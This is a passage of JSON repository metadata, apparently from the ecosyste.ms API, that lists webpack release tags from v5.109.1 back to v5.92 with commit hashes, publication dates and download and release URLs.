2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656